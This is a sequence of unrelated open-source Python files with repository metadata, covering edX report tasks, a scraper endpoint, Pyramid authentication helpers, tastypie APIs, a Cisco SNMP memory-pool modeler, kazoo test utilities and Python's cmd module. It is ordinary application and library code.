    total_seats = self_purchased_seat_count + bulk_purchased_seat_count + total_invoiced_seats

    # Percentages and average price are zero when no seats have been sold.
    if total_seats != 0:
        self_purchases_percentage = (float(self_purchased_seat_count) / float(total_seats)) * 100
        bulk_purchases_percentage = (float(bulk_purchased_seat_count) / float(total_seats)) * 100
        invoice_purchases_percentage = (float(total_invoiced_seats) / float(total_seats)) * 100
        avg_price_paid = gross_revenue / total_seats
    else:
        self_purchases_percentage = 0.0
        bulk_purchases_percentage = 0.0
        invoice_purchases_percentage = 0.0
        avg_price_paid = 0.0

    course = get_course_by_id(course_id, depth=0)
    currency = settings.PAID_COURSE_REGISTRATION_CURRENCY[1]
    return {
        'display_name': course.display_name,
        'start_date': course.start.strftime("%Y-%m-%d") if course.start is not None else 'N/A',
        'end_date': course.end.strftime("%Y-%m-%d") if course.end is not None else 'N/A',
        'total_seats': total_seats,
        'currency': currency,
        'gross_revenue': float(gross_revenue),
        'gross_paid_revenue': float(gross_paid_revenue),
        'gross_pending_revenue': gross_pending_revenue,
        'total_seats_refunded': total_seats_refunded,
        'total_amount_refunded': float(total_amount_refunded),
        'average_paid_price': float(avg_price_paid),
        'discount_codes_data': top_discounted_codes,
        'total_seats_using_discount_codes': total_coupon_codes_purchases,
        'total_self_purchase_seats': self_purchased_seat_count,
        'total_bulk_purchase_seats': bulk_purchased_seat_count,
        'total_invoiced_seats': total_invoiced_seats,
        'unused_bulk_purchase_code_count': unused_registration_codes,
        'self_purchases_percentage': self_purchases_percentage,
        'bulk_purchases_percentage': bulk_purchases_percentage,
        'invoice_purchases_percentage': invoice_purchases_percentage,
    }
def upload_exec_summary_report(_xmodule_instance_args, _entry_id, course_id, _task_input, action_name): # pylint: disable=too-many-statements
    """
    For a given `course_id`, generate a html report containing information,
    which provides a snapshot of how the course is doing.

    The report data is gathered via get_executive_report(), augmented with
    the true (non-staff) enrollment count, and uploaded to the report store.
    Returns the final task-progress state dict.
    """
    start_time = time()
    report_generation_date = datetime.now(UTC)
    status_interval = 100
    enrolled_users = CourseEnrollment.objects.users_enrolled_in(course_id)
    true_enrollment_count = 0
    # Count only "real" learners: exclude staff accounts and any user holding
    # one of the FILTERED_OUT_ROLES access roles for this course.
    for user in enrolled_users:
        if not user.is_staff and not CourseAccessRole.objects.filter(
            user=user, course_id=course_id, role__in=FILTERED_OUT_ROLES
        ).exists():
            true_enrollment_count += 1
    task_progress = TaskProgress(action_name, true_enrollment_count, start_time)
    fmt = u'Task: {task_id}, InstructorTask ID: {entry_id}, Course: {course_id}, Input: {task_input}'
    task_info_string = fmt.format(
        task_id=_xmodule_instance_args.get('task_id') if _xmodule_instance_args is not None else None,
        entry_id=_entry_id,
        course_id=course_id,
        task_input=_task_input
    )
    TASK_LOG.info(u'%s, Task type: %s, Starting task execution', task_info_string, action_name)
    current_step = {'step': 'Gathering executive summary report information'}
    TASK_LOG.info(
        u'%s, Task type: %s, Current step: %s, generating executive summary report',
        task_info_string,
        action_name,
        current_step
    )
    # attempted is 0 here, so this always publishes the initial step once.
    if task_progress.attempted % status_interval == 0:
        task_progress.update_task_state(extra_meta=current_step)
    task_progress.attempted += 1
    # get the course executive summary report information.
    data_dict = get_executive_report(course_id)
    data_dict.update(
        {
            'total_enrollments': true_enrollment_count,
            'report_generation_date': report_generation_date.strftime("%Y-%m-%d"),
        }
    )
    # By this point, we've got the data that we need to generate html report.
    current_step = {'step': 'Uploading executive summary report HTML file'}
    task_progress.update_task_state(extra_meta=current_step)
    TASK_LOG.info(u'%s, Task type: %s, Current step: %s', task_info_string, action_name, current_step)
    # Perform the actual upload
    upload_exec_summary_to_store(data_dict, 'executive_report', course_id, report_generation_date)
    task_progress.succeeded += 1
    # One last update before we close out...
    TASK_LOG.info(u'%s, Task type: %s, Finalizing executive summary report task', task_info_string, action_name)
    return task_progress.update_task_state(extra_meta=current_step)
def generate_students_certificates(
        _xmodule_instance_args, _entry_id, course_id, task_input, action_name): # pylint: disable=unused-argument
    """
    For a given `course_id`, generate certificates for all students
    that are enrolled.

    Students who already hold a certificate are counted as skipped; the rest
    are attempted one by one. Returns the final task-progress state dict.
    """
    start_time = time()
    enrolled_students = use_read_replica_if_available(CourseEnrollment.objects.users_enrolled_in(course_id))
    task_progress = TaskProgress(action_name, enrolled_students.count(), start_time)
    current_step = {'step': 'Calculating students already have certificates'}
    task_progress.update_task_state(extra_meta=current_step)
    students_require_certs = students_require_certificate(course_id, enrolled_students)
    # Everyone who already has a certificate is "skipped" rather than attempted.
    task_progress.skipped = task_progress.total - len(students_require_certs)
    current_step = {'step': 'Generating Certificates'}
    task_progress.update_task_state(extra_meta=current_step)
    course = modulestore().get_course(course_id, depth=0)
    # Generate certificate for each student
    for student in students_require_certs:
        task_progress.attempted += 1
        status = generate_user_certificates(
            student,
            course_id,
            course=course
        )
        # Both "generating" and "downloadable" count as success; any other
        # status (e.g. not-passing) is recorded as a failure.
        if status in [CertificateStatuses.generating, CertificateStatuses.downloadable]:
            task_progress.succeeded += 1
        else:
            task_progress.failed += 1
    return task_progress.update_task_state(extra_meta=current_step)
def cohort_students_and_upload(_xmodule_instance_args, _entry_id, course_id, task_input, action_name):
    """
    Within a given course, cohort students in bulk, then upload the results
    using a `ReportStore`.

    The input CSV (task_input['file_name']) is read twice: once to count the
    rows (for progress totals) and once to perform the assignments. A summary
    CSV keyed by cohort name is then uploaded to the report store.
    """
    start_time = time()
    start_date = datetime.now(UTC)
    # Iterate through rows to get total assignments for task progress
    with DefaultStorage().open(task_input['file_name']) as f:
        total_assignments = 0
        for _line in unicodecsv.DictReader(UniversalNewlineIterator(f)):
            total_assignments += 1
    task_progress = TaskProgress(action_name, total_assignments, start_time)
    current_step = {'step': 'Cohorting Students'}
    task_progress.update_task_state(extra_meta=current_step)
    # cohorts_status is a mapping from cohort_name to metadata about
    # that cohort. The metadata will include information about users
    # successfully added to the cohort, users not found, and a cached
    # reference to the corresponding cohort object to prevent
    # redundant cohort queries.
    cohorts_status = {}
    # Second pass over the CSV: actually assign each row's user to a cohort.
    with DefaultStorage().open(task_input['file_name']) as f:
        for row in unicodecsv.DictReader(UniversalNewlineIterator(f), encoding='utf-8'):
            # Try to use the 'email' field to identify the user. If it's not present, use 'username'.
            username_or_email = row.get('email') or row.get('username')
            cohort_name = row.get('cohort') or ''
            task_progress.attempted += 1
            # First time this cohort is seen: initialize its stats and look
            # up (and cache) the cohort object itself.
            if not cohorts_status.get(cohort_name):
                cohorts_status[cohort_name] = {
                    'Cohort Name': cohort_name,
                    'Students Added': 0,
                    'Students Not Found': set()
                }
                try:
                    cohorts_status[cohort_name]['cohort'] = CourseUserGroup.objects.get(
                        course_id=course_id,
                        group_type=CourseUserGroup.COHORT,
                        name=cohort_name
                    )
                    cohorts_status[cohort_name]["Exists"] = True
                except CourseUserGroup.DoesNotExist:
                    cohorts_status[cohort_name]["Exists"] = False
            # Rows naming a nonexistent cohort are counted as failures.
            if not cohorts_status[cohort_name]['Exists']:
                task_progress.failed += 1
                continue
            try:
                # NOTE(review): transaction.commit_on_success is the
                # pre-Django-1.6 atomic-block API — confirm Django version.
                with transaction.commit_on_success():
                    add_user_to_cohort(cohorts_status[cohort_name]['cohort'], username_or_email)
                cohorts_status[cohort_name]['Students Added'] += 1
                task_progress.succeeded += 1
            except User.DoesNotExist:
                cohorts_status[cohort_name]['Students Not Found'].add(username_or_email)
                task_progress.failed += 1
            except ValueError:
                # Raised when the user is already in the given cohort
                task_progress.skipped += 1
            task_progress.update_task_state(extra_meta=current_step)
    current_step['step'] = 'Uploading CSV'
    task_progress.update_task_state(extra_meta=current_step)
    # Filter the output of `add_users_to_cohorts` in order to upload the result.
    output_header = ['Cohort Name', 'Exists', 'Students Added', 'Students Not Found']
    output_rows = [
        [
            # The not-found names are stored as a set; flatten them into a
            # single comma-separated cell.
            ','.join(status_dict.get(column_name, '')) if column_name == 'Students Not Found'
            else status_dict[column_name]
            for column_name in output_header
        ]
        for _cohort_name, status_dict in cohorts_status.iteritems()
    ]
    output_rows.insert(0, output_header)
    upload_csv_to_report_store(output_rows, 'cohort_results', course_id, start_date)
    return task_progress.update_task_state(extra_meta=current_step)
def students_require_certificate(course_id, enrolled_students):
    """Return the enrolled students that still need a certificate.

    Students who already have a certificate record for ``course_id`` in any
    status other than ``unavailable`` are removed from the result.

    :param course_id: course key used to match generated certificates
    :param enrolled_students: iterable of enrolled ``User`` objects
    :return: list of ``User`` objects without a usable certificate
    """
    # Users that already hold a certificate row for this course whose
    # status is anything but "unavailable".
    certified = use_read_replica_if_available(
        User.objects.filter(
            ~Q(generatedcertificate__status=CertificateStatuses.unavailable),
            generatedcertificate__course_id=course_id,
        )
    )
    remaining = set(enrolled_students) - set(certified)
    return list(remaining)
| edcast-inc/edx-platform-edcast | lms/djangoapps/instructor_task/tasks_helper.py | Python | agpl-3.0 | 64,173 |
#!/usr/bin/python
from lxml import html
import requests
# Keys that must be present in the params dict handed to Endpoint().
INIT_FIELDS = [
    'endpoint_url',
    'resource_url',
    'xpath',
]
'''
Encapsulates an endpoint to RESTful api service
'''
class Endpoint(object):
    """A single GET endpoint that scrapes an HTML resource via an XPath query."""

    def __init__(self, params):
        """Validate that every key in INIT_FIELDS is present, then store params.

        Raises EndpointException naming the first missing required field.
        """
        missing = [f for f in INIT_FIELDS if f not in params]
        if missing:
            raise EndpointException('\'%s\' is a required field.' % missing[0])
        self._params = params
        self._params['endpoint_url'] = self.valid_url(params['endpoint_url'])

    def do_get(self):
        """Serve a GET for this endpoint by scraping its resource."""
        return self.scrape(self._params['resource_url'], self._params['xpath'])

    def scrape(self, resource_url, xpath):
        """Download ``resource_url`` and return the XPath matches from its HTML."""
        response = requests.get(resource_url)
        return html.fromstring(response.text).xpath(xpath)

    def url(self):
        """Return the normalized endpoint URL."""
        return self._params['endpoint_url']

    def valid_url(self, endpoint_url):
        """Normalize ``endpoint_url`` so it begins and ends with a slash."""
        prefixed = endpoint_url if endpoint_url.startswith('/') else '/' + endpoint_url
        return prefixed if prefixed.endswith('/') else prefixed + '/'
class EndpointException(Exception):
    """Raised when an Endpoint is constructed without a required field."""
    pass
| alextbok/deployable-scraper-api | src/endpoint.py | Python | apache-2.0 | 1,013 |
import marketing_campaign_activity | smartforceplus/SmartForceplus | .local/share/Odoo/addons/8.0/entity_sms_campaign/__init__.py | Python | agpl-3.0 | 34 |
from typing import (
Any,
Callable,
ClassVar,
Generic,
List,
Optional,
Sequence,
Tuple,
TypeVar,
)
import typing_extensions
# Any callable whose execution time can be measured.
TimedFunction = Callable[..., Any]
class MultiTimerObject(typing_extensions.Protocol):
    """Structural type for timers that benchmark several functions at once.

    The method names mirror ``timeit.Timer`` — presumably with the same
    semantics, applied per function and per domain value (confirm against
    the concrete implementation).
    """
    # The functions whose timings are collected.
    functions: List[TimedFunction]
    def repeat(
        self, domain: Sequence[Any], repeat: int, number: int, *args: Any, **kwargs: Any
    ) -> List[List[List[int]]]:
        """Collect ``repeat`` timing runs of ``number`` calls per domain value."""
        ...
    def timeit(
        self, domain: Sequence[Any], number: int, *args: Any, **kwargs: Any
    ) -> List[List[int]]:
        """Time ``number`` calls for each domain value."""
        ...
    def autorange(
        self, domain: Sequence[Any], *args: Any, **kwargs: Any
    ) -> List[List[int]]:
        """Time each domain value with an automatically chosen call count."""
        ...
class FunctionTimerObject(typing_extensions.Protocol):
    """Structural type for objects that expose a shared MultiTimerObject."""
    # Class-level timer shared by all instances.
    multi_timer: ClassVar[MultiTimerObject]
# TIn: the graph/axes object consumed; TOut: the artist/handle objects produced.
TIn = TypeVar("TIn", contravariant=True)
TOut = TypeVar("TOut")
class Graph(typing_extensions.Protocol, Generic[TIn, TOut]):
    """Structural type for plotting timing results onto a graph object."""
    def graph(
        self,
        graph: TIn,
        values: List[float],
        errors: List[float],
        domain: List[Any],
        *,
        functions: Optional[List[TimedFunction]] = None,
        colors: Tuple[str, ...] = (),
        title: Optional[str] = None,
        legend: bool = True,
        error: bool = True
    ) -> List[TOut]:
        """Plot ``values`` against ``domain``; presumably ``errors`` become
        error bars when ``error`` is true — confirm in the implementation."""
        ...
import base64
import os
from passlib.context import CryptContext
from pyramid.authentication import (
BasicAuthAuthenticationPolicy as _BasicAuthAuthenticationPolicy,
)
from pyramid.path import (
DottedNameResolver,
caller_package,
)
from contentbase import ROOT
CRYPT_CONTEXT = __name__ + ':crypt_context'
def includeme(config):
    """Pyramid ``config.include`` hook: build and register a CryptContext.

    All ``passlib.*`` registry settings are collected (with the prefix
    stripped) and passed to passlib; the resulting context is stored in the
    registry under ``CRYPT_CONTEXT``.
    """
    config.include('.edw_hash')
    setting_prefix = 'passlib.'
    passlib_settings = {
        k[len(setting_prefix):]: v
        for k, v in config.registry.settings.items()
        if k.startswith(setting_prefix)
    }
    if not passlib_settings:
        # Default scheme when the deployment provides no passlib settings.
        passlib_settings = {'schemes': 'edw_hash, unix_disabled'}
    crypt_context = CryptContext(**passlib_settings)
    config.registry[CRYPT_CONTEXT] = crypt_context
class NamespacedAuthenticationPolicy(object):
    """ Wrapper for authentication policy classes
    As userids are included in the list of principals, it seems good practice
    to namespace them to avoid clashes.
    Constructor Arguments
    ``namespace``
        The namespace used (string).
    ``base``
        The base authentication policy (class or dotted name).
    Remaining arguments are passed to the ``base`` constructor.
    Example
    To make a ``REMOTE_USER`` 'admin' be 'user.admin'
    .. code-block:: python
        policy = NamespacedAuthenticationPolicy('user',
            'pyramid.authentication.RemoteUserAuthenticationPolicy')
    """
    def __new__(cls, namespace, base, *args, **kw):
        # Dotted name support makes it easy to configure with pyramid_multiauth
        name_resolver = DottedNameResolver(caller_package())
        base = name_resolver.maybe_resolve(base)
        # Dynamically create a subclass that mixes this wrapper with the
        # resolved base policy; the namespace prefix is baked in as a
        # class attribute so the instance methods below can use it.
        name = 'Namespaced_%s_%s' % (namespace, base.__name__)
        klass = type(name, (cls, base), {'_namespace_prefix': namespace + '.'})
        return super(NamespacedAuthenticationPolicy, klass).__new__(klass)
    def __init__(self, namespace, base, *args, **kw):
        # namespace/base were consumed by __new__; forward the rest to the
        # base policy's constructor.
        super(NamespacedAuthenticationPolicy, self).__init__(*args, **kw)
    def unauthenticated_userid(self, request):
        # Prefix the base policy's userid with this policy's namespace.
        userid = super(NamespacedAuthenticationPolicy, self) \
            .unauthenticated_userid(request)
        if userid is not None:
            userid = self._namespace_prefix + userid
        return userid
    def remember(self, request, principal, **kw):
        # Only remember principals belonging to this namespace; strip the
        # prefix before delegating to the base policy.
        if not principal.startswith(self._namespace_prefix):
            return []
        principal = principal[len(self._namespace_prefix):]
        return super(NamespacedAuthenticationPolicy, self) \
            .remember(request, principal, **kw)
class BasicAuthAuthenticationPolicy(_BasicAuthAuthenticationPolicy):
    """Pyramid basic-auth policy whose ``check`` may be given as a dotted name."""
    def __init__(self, check, *args, **kw):
        # Dotted name support makes it easy to configure with pyramid_multiauth
        name_resolver = DottedNameResolver(caller_package())
        check = name_resolver.maybe_resolve(check)
        super(BasicAuthAuthenticationPolicy, self).__init__(check, *args, **kw)
def basic_auth_check(username, password, request):
    """Basic-auth callback: validate an access-key id/secret pair.

    Returns an (empty) list of extra principals when the credentials are
    valid, or None to reject them.
    """
    # We may get called before the context is found and the root set
    root = request.registry[ROOT]
    collection = root['access-keys']
    try:
        access_key = collection[username]
    except KeyError:
        # Unknown access-key id.
        return None
    properties = access_key.properties
    hash = properties['secret_access_key_hash']
    crypt_context = request.registry[CRYPT_CONTEXT]
    valid = crypt_context.verify(password, hash)
    if not valid:
        return None
    #valid, new_hash = crypt_context.verify_and_update(password, hash)
    #if new_hash:
    #    replace_user_hash(user, new_hash)
    return []
def generate_user():
    """ Generate a random user name with 40 bits of entropy

    Returns an 8-character upper-case base32 string.  (The previous
    docstring claimed 64 bits and the comment 80 bits; os.urandom(5)
    actually provides 5 bytes = 40 bits.)
    """
    # 5 random bytes (40 bits) encode to exactly 8 base32 characters with
    # no '=' padding, so rstrip/upper are defensive no-ops.
    random_bytes = os.urandom(5)
    user = base64.b32encode(random_bytes).decode('ascii').rstrip('=').upper()
    return user
def generate_password():
    """ Generate a password with 80 bits of entropy

    Returns a 16-character lower-case base32 string.
    """
    # 10 random bytes (80 bits) encode to exactly 16 base32 characters,
    # so there is no '=' padding to strip.
    encoded = base64.b32encode(os.urandom(10))
    return encoded.decode('ascii').rstrip('=').lower()
# NOTE(review): appears to be a stub-resolution test fixture — a module that
# exists only as .py; the value itself is an empty-string placeholder.
in_python = ''
| snakeleon/YouCompleteMe-x64 | third_party/ycmd/third_party/jedi_deps/jedi/test/completion/stub_folder/with_stub_folder/python_only.py | Python | gpl-3.0 | 15 |
from tastypie import fields
from tastypie.resources import ModelResource, ALL, ALL_WITH_RELATIONS
from teachers.models import Teacher, TeacherClass, Entry
from core.utils import CORSResource
class TeacherResource(CORSResource, ModelResource):
    """Read-only tastypie resource for Teacher rows, filterable by email/name."""

    class Meta:
        queryset = Teacher.objects.all()
        resource_name = 'teacher'
        filtering = {
            'email': ALL,
            'name': ALL,
        }
        # Read-only endpoint: only GET is accepted for list and detail.
        list_allowed_methods = ['get']
        detail_allowed_methods = ['get']
class TeacherClassResource(CORSResource, ModelResource):
    """Read-only tastypie resource for TeacherClass rows."""

    # Link back to the owning teacher (not embedded in responses).
    teacher = fields.ForeignKey(TeacherResource, 'teacher')

    class Meta:
        queryset = TeacherClass.objects.all()
        resource_name = 'teacher_class'
        filtering = {
            'teacher': ALL_WITH_RELATIONS,
            'name': ALL_WITH_RELATIONS,
            'course_id': ALL,
        }
        # Read-only endpoint: only GET is accepted for list and detail.
        list_allowed_methods = ['get']
        detail_allowed_methods = ['get']
class EntryResource(CORSResource, ModelResource):
    """Read-only tastypie resource for Entry rows with embedded relations."""

    # full=True embeds the related objects in each entry's representation.
    teacher = fields.ForeignKey(TeacherResource, 'teacher', full=True)
    teacher_class = fields.ForeignKey(TeacherClassResource, 'teacher_class', full=True)

    class Meta:
        queryset = Entry.objects.all()
        resource_name = 'entry'
        filtering = {
            'teacher': ALL_WITH_RELATIONS,
            'teacher_class': ALL_WITH_RELATIONS,
            'date': ALL,
            # NOTE(review): 'teacher_name' is not declared as a field on this
            # resource — confirm this filter key is actually usable.
            'teacher_name': ALL_WITH_RELATIONS
        }
        # Read-only endpoint: only GET is accepted for list and detail.
        list_allowed_methods = ['get']
        detail_allowed_methods = ['get']
| trawick/edurepo | src/edurepo/teachers/api.py | Python | apache-2.0 | 1,524 |
__doc__ = """CiscoMemoryPool
models memory pools from a Cisco IOS device
"""
from Products.DataCollector.plugins.CollectorPlugin \
import SnmpPlugin, GetTableMap
from Products.DataCollector.plugins.DataMaps \
import MultiArgs, RelationshipMap, ObjectMap
class CiscoMemoryPool(SnmpPlugin):
    """Models memory pools on Cisco IOS devices from CISCO-MEMORY-POOL-MIB."""

    maptype = 'MemoryPool'
    relname = 'memoryPools'
    modname = 'ZenPacks.daviswr.Cisco.IOS.Memory.MemoryPool'

    # Columns of ciscoMemoryPoolEntry, keyed by trailing OID, mapped to the
    # attribute names used in process() below.
    ciscoMemoryPoolEntry = {
        # ciscoMemoryPoolName
        '.2': 'title',
        # ciscoMemoryPoolAlternate
        '.3': 'alt_idx',
        # ciscoMemoryPoolValid
        '.4': 'valid',
        # ciscoMemoryPoolUsed
        '.5': 'used',
        # ciscoMemoryPoolFree
        '.6': 'free',
    }

    snmpGetTableMaps = (
        GetTableMap(
            'ciscoMemoryPoolTable',
            '.1.3.6.1.4.1.9.9.48.1.1.1',
            ciscoMemoryPoolEntry
        ),
    )

    def condition(self, device, log):
        """determine if this modeler should run"""
        # CISCO-SMI::ciscoProducts — only model devices whose sysObjectID
        # falls under the Cisco products subtree.
        is_cisco = device.snmpOid.startswith('.1.3.6.1.4.1.9.1')
        if not is_cisco:
            log.info('%s is not a Cisco IOS device', device.id)
        return is_cisco

    def process(self, device, results, log):
        """collect snmp information from this device"""
        log.info('processing %s for device %s', self.name(), device.id)
        _getdata, tabledata = results
        log.debug('SNMP Tables:\n%s', tabledata)
        # Build the relationship map up front so that a missing table still
        # returns a valid (empty) map instead of referencing an unbound name.
        rm = self.relMap()
        pool_table = tabledata.get('ciscoMemoryPoolTable')
        if pool_table is None:
            log.error('Unable to get ciscoMemoryPoolTable for %s', device.id)
            return rm
        log.debug(
            'ciscoMemoryPoolTable has %s entries',
            len(pool_table)
        )
        # Memory Pools
        for snmpindex in pool_table:
            row = pool_table[snmpindex]
            name = row.get('title', None)
            if name is None:
                continue
            elif '' == name or len(name) == 0:
                # Unnamed pools get a synthetic title from their index.
                name = 'Memory Pool {0}'.format(snmpindex)
            log.debug('%s found memory pool: %s', self.name(), name)
            # Resolve the alternate pool's human-readable name when the
            # alternate index points at another pool (index > 0).
            alt_row = pool_table.get(str(row['alt_idx']), dict())
            row['alternate'] = alt_row.get('title', 'Yes') \
                if row.get('alt_idx', 0) > 0 \
                else 'None'
            if 'valid' in row:
                # ciscoMemoryPoolValid is a TruthValue: 1 means true.
                row['valid'] = row.get('valid') == 1
            row['size'] = row.get('free', 0) + row.get('used', 0)
            # Update dictionary and create Object Map
            row.update({
                'snmpindex': snmpindex.strip('.'),
                'id': self.prepId('mempool_{0}'.format(name))
            })
            rm.append(ObjectMap(
                modname='ZenPacks.daviswr.Cisco.IOS.Memory.MemoryPool',
                data=row
            ))
        log.debug('%s RelMap:\n%s', self.name(), str(rm))
        return rm
| daviswr/ZenPacks.daviswr.Cisco.IOS.Memory | ZenPacks/daviswr/Cisco/IOS/Memory/modeler/plugins/daviswr/snmp/CiscoMemoryPool.py | Python | mit | 3,164 |
##############################################################################
#
# Copyright Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
import logging
import os
import time
# Truthy (the raw env-var value) when running under Travis CI, else False.
TRAVIS = os.environ.get('TRAVIS', False)
# ZooKeeper version under test on Travis, parsed into an int tuple
# (e.g. "3.4.6" -> (3, 4, 6)); falsy when not on Travis or unset.
TRAVIS_ZK_VERSION = TRAVIS and os.environ.get('ZOOKEEPER_VERSION', None)
if TRAVIS_ZK_VERSION:
    if '-' in TRAVIS_ZK_VERSION:
        # Ignore pre-release markers like -alpha
        TRAVIS_ZK_VERSION = TRAVIS_ZK_VERSION.split('-')[0]
    TRAVIS_ZK_VERSION = tuple([int(n) for n in TRAVIS_ZK_VERSION.split('.')])
class Handler(logging.Handler):
    """A logging handler that records every emitted record in memory.

    Attach to the named loggers with ``install`` and detach (restoring
    their previous levels) with ``uninstall``.
    """

    def __init__(self, *names, **kw):
        logging.Handler.__init__(self)
        self.names = names
        self.records = []
        self.setLoggerLevel(**kw)

    def setLoggerLevel(self, level=1):
        """Remember the level applied to the target loggers on install."""
        self.level = level
        self.oldlevels = {}

    def emit(self, record):
        """Capture the record instead of writing it anywhere."""
        self.records.append(record)

    def clear(self):
        """Drop all captured records."""
        del self.records[:]

    def install(self):
        """Attach to each named logger, saving its current level first."""
        for name in self.names:
            target = logging.getLogger(name)
            self.oldlevels[name] = target.level
            target.setLevel(self.level)
            target.addHandler(self)

    def uninstall(self):
        """Detach from each named logger and restore its saved level."""
        for name in self.names:
            target = logging.getLogger(name)
            target.setLevel(self.oldlevels[name])
            target.removeHandler(self)

    def __str__(self):
        def format_record(record):
            # Keep only non-blank message lines, indenting the block by two.
            body = '\n'.join(
                line for line in record.getMessage().split('\n')
                if line.strip()
            )
            return "%s %s\n  %s" % (record.name, record.levelname, body)
        return '\n'.join(format_record(r) for r in self.records)
class InstalledHandler(Handler):
    """A Handler that attaches itself to its loggers immediately."""

    def __init__(self, *names, **kw):
        super(InstalledHandler, self).__init__(*names, **kw)
        self.install()
class Wait(object):
    """Poll a condition until it becomes true or a timeout elapses.

    Callable directly (``wait(cond)``) or usable as a decorator factory
    (``@wait(timeout=...)``).  ``getnow``/``getsleep`` are factories that
    return the clock and sleep functions, which makes the class testable
    with fake time.
    """

    class TimeOutWaitingFor(Exception):
        "A test condition timed out"

    # Default timeout and polling interval, in seconds.
    timeout = 9
    wait = .01

    def __init__(self, timeout=None, wait=None, exception=None,
                 getnow=(lambda: time.time), getsleep=(lambda: time.sleep)):
        if timeout is not None:
            self.timeout = timeout
        if wait is not None:
            self.wait = wait
        if exception is not None:
            self.TimeOutWaitingFor = exception
        self.getnow = getnow
        self.getsleep = getsleep

    def __call__(self, func=None, timeout=None, wait=None, message=None):
        # No function yet: act as a decorator factory carrying the options.
        if func is None:
            return lambda func: self(func, timeout, wait, message)
        # Fast path: the condition already holds, nothing to wait for.
        if func():
            return
        now = self.getnow()
        sleep = self.getsleep()
        timeout = self.timeout if timeout is None else timeout
        wait = float(self.wait if wait is None else wait)
        deadline = now() + timeout
        while True:
            sleep(wait)
            if func():
                return
            if now() > deadline:
                raise self.TimeOutWaitingFor(
                    message or
                    getattr(func, '__doc__') or
                    getattr(func, '__name__')
                )
| johankaito/fufuka | microblog/venv/lib/python2.7/site-packages/kazoo/tests/util.py | Python | apache-2.0 | 3,657 |
"""A generic class to build line-oriented command interpreters.
Interpreters constructed with this class obey the following conventions:
1. End of file on input is processed as the command 'EOF'.
2. A command is parsed out of each line by collecting the prefix composed
of characters in the identchars member.
3. A command `foo' is dispatched to a method 'do_foo()'; the do_ method
is passed a single argument consisting of the remainder of the line.
4. Typing an empty line repeats the last command. (Actually, it calls the
method `emptyline', which may be overridden in a subclass.)
5. There is a predefined `help' method. Given an argument `topic', it
calls the command `help_topic'. With no arguments, it lists all topics
with defined help_ functions, broken into up to three topics; documented
commands, miscellaneous help topics, and undocumented commands.
6. The command '?' is a synonym for `help'. The command '!' is a synonym
for `shell', if a do_shell method exists.
7. If completion is enabled, completing commands will be done automatically,
and completing of commands args is done by calling complete_foo() with
arguments text, line, begidx, endidx. text is string we are matching
against, all returned matches must begin with it. line is the current
input line (lstripped), begidx and endidx are the beginning and end
indexes of the text being matched, which could be used to provide
different completion depending upon which position the argument is in.
The `default' method may be overridden to intercept commands for which there
is no do_ method.
The `completedefault' method may be overridden to intercept completions for
commands that have no complete_ method.
The data member `self.ruler' sets the character used to draw separator lines
in the help messages. If empty, no ruler line is drawn. It defaults to "=".
If the value of `self.intro' is nonempty when the cmdloop method is called,
it is printed out on interpreter startup. This value may be overridden
via an optional argument to the cmdloop() method.
The data members `self.doc_header', `self.misc_header', and
`self.undoc_header' set the headers used for the help function's
listings of documented functions, miscellaneous topics, and undocumented
functions respectively.
These interpreters use raw_input; thus, if the readline module is loaded,
they automatically support Emacs-like command history and editing features.
"""
import string, sys
__all__ = ["Cmd"]
# Default interactive prompt; overridable per instance via ``prompt``.
PROMPT = '(Cmd) '
# Characters allowed in a command word; consumed by parseline().
IDENTCHARS = string.ascii_letters + string.digits + '_'
class Cmd:
    """A simple framework for writing line-oriented command interpreters.
    These are often useful for test harnesses, administrative tools, and
    prototypes that will later be wrapped in a more sophisticated interface.
    A Cmd instance or subclass instance is a line-oriented interpreter
    framework.  There is no good reason to instantiate Cmd itself; rather,
    it's useful as a superclass of an interpreter class you define yourself
    in order to inherit Cmd's methods and encapsulate action methods.
    """
    # Class-level defaults; subclasses typically override a few of these.
    prompt = PROMPT
    identchars = IDENTCHARS
    ruler = '='
    lastcmd = ''
    intro = None
    doc_leader = ""
    doc_header = "Documented commands (type help <topic>):"
    misc_header = "Miscellaneous help topics:"
    undoc_header = "Undocumented commands:"
    nohelp = "*** No help on %s"
    # When true, use raw_input(); otherwise read sys.stdin directly.
    use_rawinput = 1
    def __init__(self, completekey='tab'):
        """Instantiate a line-oriented interpreter framework.
        The optional argument is the readline name of a completion key;
        it defaults to the Tab key. If completekey is not None and the
        readline module is available, command completion is done
        automatically.
        """
        self.cmdqueue = []
        self.completekey = completekey
    def cmdloop(self, intro=None):
        """Repeatedly issue a prompt, accept input, parse an initial prefix
        off the received input, and dispatch to action methods, passing them
        the remainder of the line as argument.
        """
        self.preloop()
        if intro is not None:
            self.intro = intro
        if self.intro:
            print self.intro
        stop = None
        while not stop:
            # Queued commands (self.cmdqueue) take precedence over input.
            if self.cmdqueue:
                line = self.cmdqueue[0]
                del self.cmdqueue[0]
            else:
                if self.use_rawinput:
                    try:
                        line = raw_input(self.prompt)
                    except EOFError:
                        # End of input is dispatched as the 'EOF' command.
                        line = 'EOF'
                else:
                    sys.stdout.write(self.prompt)
                    sys.stdout.flush()
                    line = sys.stdin.readline()
                    if not len(line):
                        line = 'EOF'
                    else:
                        line = line[:-1] # chop \n
            line = self.precmd(line)
            stop = self.onecmd(line)
            stop = self.postcmd(stop, line)
        self.postloop()
    def precmd(self, line):
        """Hook method executed just before the command line is
        interpreted, but after the input prompt is generated and issued.
        """
        return line
    def postcmd(self, stop, line):
        """Hook method executed just after a command dispatch is finished."""
        return stop
    def preloop(self):
        """Hook method executed once when the cmdloop() method is called."""
        # Install our completer into readline, remembering the old one so
        # postloop() can restore it.
        if self.completekey:
            try:
                import readline
                self.old_completer = readline.get_completer()
                readline.set_completer(self.complete)
                readline.parse_and_bind(self.completekey+": complete")
            except ImportError:
                pass
    def postloop(self):
        """Hook method executed once when the cmdloop() method is about to
        return.
        """
        if self.completekey:
            try:
                import readline
                readline.set_completer(self.old_completer)
            except ImportError:
                pass
    def parseline(self, line):
        """Split a line into (command, args, line), expanding the '?' and
        '!' shorthands to 'help' and 'shell'.  Returns (None, None, line)
